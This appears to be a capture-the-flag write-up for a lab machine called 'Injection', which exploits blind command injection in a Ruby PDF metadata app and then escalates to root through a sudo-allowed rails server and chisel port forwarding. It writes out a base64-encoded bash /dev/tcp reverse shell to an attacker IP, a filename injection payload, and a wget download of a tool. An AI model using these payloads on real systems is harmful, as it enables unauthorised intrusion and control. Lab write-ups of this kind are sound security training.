Published on

Injection Writeup

Authors
logo

Port Scanning

nmap -sV -sC -p- -v $IP --open

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 12:68:ac:62:e8:c0:bf:55:25:85:06:96:4b:99:bb:4a (ECDSA)
|_  256 65:dc:ed:09:75:7b:d2:d9:a0:19:e5:1c:e7:1d:14:53 (ED25519)
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help, NCP:
|     HTTP/1.1 400 Bad Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     X-Frame-Options: SAMEORIGIN
|     X-XSS-Protection: 0
|     X-Content-Type-Options: nosniff
|     X-Download-Options: noopen
|     X-Permitted-Cross-Domain-Policies: none

Only ports 22 (SSH) and 3000 (HTTP) are open.

Enumeration

http://172.16.4.120:3000

This is an application called &&PDFInfo&&, capable of reading PDF metadata.

injection

When uploading a PDF, we can see that the application is developed in Ruby:

injection 1

By searching for pdfinfo ruby exploit, we find associated CVEs.

https://github.com/affix/CVE-2022-36231

injection 2

In this specific case, we have a Command Injection vulnerability.

I tested the id command but got no success, indicating a Blind Command Injection.

Using the sleep 5 command, we observe a delay in the response.

;$(sleep 5).pdf

injection 3

Foot Hold

Passing the reverse shell in the traditional way does not work, so the alternative was to encode the payload in base64 before sending.

echo "bash -c 'exec bash -i &>/dev/tcp/10.0.31.150/1234 <&1'" | base64

echo -n YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTAuMC4zMS4xNTAvMTMzNyA8JjEnCg== |base64 -d|sh

injection 4

Privillege Escalation

We can execute the command /usr/local/bin/rails server -e development -p 8000 as root.

sudo -l

injection 5

rm /home/deployer/pdf-read-metadata/tmp/pids/server.pid

sudo /usr/local/bin/rails server -e development -p 8000

injection 6

Now that we can start the application as root, we need to perform Port Forwarding to access the application from our machine.

The server has an accessible SSH service, but this time I used the chisel tool.

https://github.com/jpillora/chisel

To perform Port Forwarding, we need to transfer chisel to the target machine.

python -m http.server 80

injection 7

wget http://10.0.31.150/chisel

injection 8

After that, on our machine, we start the chisel server.

./chisel server -p 9000 --reverse

injection 9

Now on the target machine, we perform Port Forwarding.

Note: I used two shells to execute this successfully.

sudo /usr/local/bin/rails server -e development -p 8000 # in the /pdf-read-metadata directory

./chisel client 10.0.31.150:9000 R:8000:127.0.0.1:8000 # in the /tmp directory

injection 10

Now we can access the application from our machine.

injection 11

Now, we just need to get the reverse shell the same way as before, but this time as root.

injection 12

Proof

injection 13
Discuss on TwitterView on GitHub